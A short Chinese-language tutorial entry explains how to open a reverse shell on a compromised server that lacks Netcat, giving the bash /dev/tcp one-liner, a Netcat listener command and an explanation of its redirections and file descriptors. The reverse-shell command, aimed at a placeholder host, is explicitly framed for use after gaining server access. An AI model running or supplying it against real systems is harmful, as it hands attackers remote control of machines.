7 Netcat 反弹shell

应用场景

某些拿到服务器权限之后，想要设置一个反弹shell。但是目标服务器上没有安装Netcat时。

反弹shell命令： bash -i >& /dev/tcp/ip/port 0>&1

PC接收Netcat命令： nc -lvp port

命令解释介绍

bash -i >& /dev/tcp/ip/port 0>&1

在命令中bash -i 表示已交互模式运行bash shell。重定向符 >& ，如果在其后加文件描述符，是将bash -i 交互模式传递给文件描述符，而如果其后是文件，则将bash -i 交互模式传递给文件。/dev/tcp/ip/port表示传递给远程主机的IP地址对应的端口。

文件描述符： 0 标准输入、1标准输出、2、错误输入输出
命令中的 0>&1 表示将标准输入重定向到标准输出，实现远程的输入可以在远程输出对应内容。